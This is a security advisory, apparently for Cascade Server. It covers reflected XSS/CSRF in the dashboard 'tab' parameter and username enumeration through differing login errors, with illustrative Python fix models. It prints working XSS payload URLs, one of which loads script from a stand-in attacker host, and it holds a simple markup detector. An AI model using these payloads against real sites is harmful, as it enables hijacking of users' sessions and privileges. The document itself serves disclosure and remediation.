Security Update 05-06-2010
There are two different types of vulnerabilities mentioned in this update: XSS/CSRF and brute-force attack vulnerabilities.
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions
Severity: Moderate
Hannon Hill rates the severity of these vulnerabilities as Moderate. The vulnerabilities allow an attacker to make victims execute arbitrary JavaScript, to gain access to Cascade, or to elevate their privileges, but they require the attacker to manipulate victims using social engineering tactics. An attacker who already had Cascade credentials could embed a malicious link in frequently visited content to more easily manipulate victims into navigating to it.
Risk Assessment
The underlying vulnerability is that an input parameter's value is returned verbatim to the browser in the page that the following actions forward to: Dashboard, Open, and Browse.
XSS Vulnerability
An attacker without access to Cascade could manipulate victims using social engineering tactics into executing arbitrary JavaScript when navigating to the Cascade dashboard action. An example link would be:
http://domain:port/home.act?tab=m<script>alert(54682)</script>
An attacker with access to Cascade could embed a link to the Cascade dashboard action containing arbitrary JavaScript in a prominent place within Cascade page content to more easily manipulate victims into navigating to the link.
CSRF Vulnerability
The CSRF vulnerability is an extension of the XSS vulnerability.
Examples include:
http://<cascade_url>/home.act?tab="'><IMG%20SRC="/WF_XSRF.html">
and:
http://<cascade_url>/home.act?tab="'><script>document.domain=domain.dom</script><script%20src="http://subdomain.domain.com/attacker/x.js"/>
NOTE: Both require the attacker to have access to the Cascade server, or to a server at the same top-level domain where Cascade is running. For example, if Cascade is hosted at cascade.hannonhill.com, the attacker would also need access to the web space of a sub-domain such as intranet.hannonhill.com. In the second example, resetting the page's document domain to the top-level domain allows the attacker to bypass the browser's Same Origin policy and the security restrictions that would normally prevent a script from loading from a different server.
Vulnerability
The XSS and CSRF vulnerabilities exist in all Cascade Server versions prior to Cascade 6.4.5.
Fix
The fix is for Cascade to properly escape, or not display, user input when rendering the error message in the pages that the above actions forward to.
These have been fixed in Cascade 6.4.5 and later.
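The following Python model illustrates the underlying issue and the fix described above. It is an added example and is not Cascade's code: the error-page renderers, the set of known tab names, and the host name in the sample links are all constructed for the demonstration. The two sample links reproduce the parameter values quoted in this advisory.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample links, reusing the parameter values quoted in this
# advisory; the host "cascade.example:8080" is a placeholder.
ADVISORY_LINK_1 = "http://cascade.example:8080/home.act?tab=m<script>alert(54682)</script>"
ADVISORY_LINK_2 = "http://cascade.example:8080/home.act?tab=\"'><IMG%20SRC=\"/WF_XSRF.html\""

# Hypothetical set of valid dashboard tabs; real tab names are not on the page.
KNOWN_TABS = {"main", "assets", "reports"}


def tab_from_url(url: str) -> str:
    """Extract the 'tab' query parameter the way a server would see it
    (percent-decoded, first value only)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("tab", [""])[0]


def is_known_tab(tab: str) -> bool:
    """Allow-list check: a tab that is not one we know is an error case."""
    return tab in KNOWN_TABS


def render_error_vulnerable(tab: str) -> str:
    """'Before' behaviour from the advisory: the parameter value is written
    into the forwarded page verbatim, so any markup it contains becomes live
    HTML in the victim's browser (reflected XSS)."""
    return f"<p>Unknown dashboard tab: {tab}</p>"


def render_error_escaped(tab: str) -> str:
    """Fix, variant 1: HTML-escape the value before reflecting it. quote=True
    also escapes both quote characters, which matters for the second sample
    link, whose payload starts by closing an attribute with \"'>."""
    return f"<p>Unknown dashboard tab: {html.escape(tab, quote=True)}</p>"


def render_error_hidden(tab: str) -> str:
    """Fix, variant 2: do not reflect the value at all."""
    return "<p>Unknown dashboard tab.</p>"


def contains_live_markup(rendered: str) -> bool:
    """Coarse detector used to compare the renderers: a raw <script or <img
    tag in the output means untrusted markup survived rendering."""
    lowered = rendered.lower()
    return "<script" in lowered or "<img" in lowered


def handle_dashboard(url: str, renderer=render_error_escaped) -> str:
    """Model of the dashboard action: valid tabs render normally, anything
    else goes to the error page produced by the chosen renderer."""
    tab = tab_from_url(url)
    if is_known_tab(tab):
        return f"<h1>Dashboard: {tab}</h1>"
    return renderer(tab)
```

Escaping keeps the value visible in the error message (useful for support) while making it inert; hiding it removes the reflection entirely. Both satisfy the advisory's fix, and the allow-list check on `tab` adds a layer that does not depend on the renderer at all.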
Brute force attack vulnerability in Login action
Severity: Moderate
Hannon Hill rates the severity of this vulnerability as moderate rather than high because it does not affect all types of users or all authentication methods.
Risk Assessment
The vulnerability exists because users authenticated using LDAP and users who attempt to authenticate using Web Services are presented with different error messages when their username or password is incorrect. This opens the system up to a brute-force attack, since in some cases the attacker can confirm that a guessed username is valid.
Vulnerability
This vulnerability exists in all versions of Cascade prior to 6.4.5.
Fix
The fix is to unify the error messages so that an incorrect username or password will generate the same error regardless of protocol or authentication method.
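The following Python model shows the 'before' and 'after' login behaviour described in this section. It is an added example, not Cascade's code: the two credential stores standing in for the LDAP directory and the Web Services check, the user names, and the hashing scheme are all constructed for the demonstration.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Constructed credential stores standing in for LDAP and Web Services users.
# Hashes are computed at import time from constructed plaintext so the
# example is self-contained; real code would load stored hashes.
def _digest(password: str) -> str:
    return hashlib.sha256(password.encode("utf-8")).hexdigest()

LDAP_USERS = {"alice": _digest("correct horse")}
WEBSERVICE_USERS = {"svc-publisher": _digest("battery staple")}
AUTH_METHODS = {"ldap": LDAP_USERS, "webservices": WEBSERVICE_USERS}

# Value compared against when the user does not exist, so that the
# unknown-user path performs the same comparison as the wrong-password path.
DUMMY_DIGEST = _digest("placeholder-never-a-real-password")

GENERIC_ERROR = "Invalid username or password."


@dataclass(frozen=True)
class LoginResult:
    ok: bool
    message: str


def login_before(method: str, username: str, password: str) -> LoginResult:
    """'Before' behaviour from the advisory: each authentication method
    reports which part of the credential was wrong, so a failed login
    reveals whether the username exists."""
    store = AUTH_METHODS[method]
    if username not in store:
        return LoginResult(False, f"{method}: user not found")
    if not hmac.compare_digest(store[username], _digest(password)):
        return LoginResult(False, f"{method}: incorrect password")
    return LoginResult(True, "ok")


def login_after(method: str, username: str, password: str) -> LoginResult:
    """Fix: one message for every failure, whatever the method and whatever
    failed. Both checks always run, so the unknown-user and wrong-password
    paths do comparable work and differ only in the final boolean."""
    store = AUTH_METHODS[method]
    expected = store.get(username)
    user_exists = expected is not None
    password_ok = hmac.compare_digest(expected or DUMMY_DIGEST, _digest(password))
    if user_exists and password_ok:
        return LoginResult(True, "ok")
    return LoginResult(False, GENERIC_ERROR)


def distinct_failure_messages(login) -> set:
    """Collect every failure message a login function can produce across
    both methods and both failure kinds. An attacker can only learn
    something from the message if this set has more than one element."""
    attempts = [
        ("ldap", "alice", "wrong"),            # known LDAP user, bad password
        ("ldap", "nobody", "wrong"),           # unknown LDAP user
        ("webservices", "svc-publisher", "wrong"),
        ("webservices", "nobody", "wrong"),
    ]
    return {login(m, u, p).message for (m, u, p) in attempts}
```

Unifying the message is the fix the advisory calls for; the dummy comparison in `login_after` closes the related gap where an unknown user returns measurably faster than a wrong password, which would otherwise leak the same information through response timing.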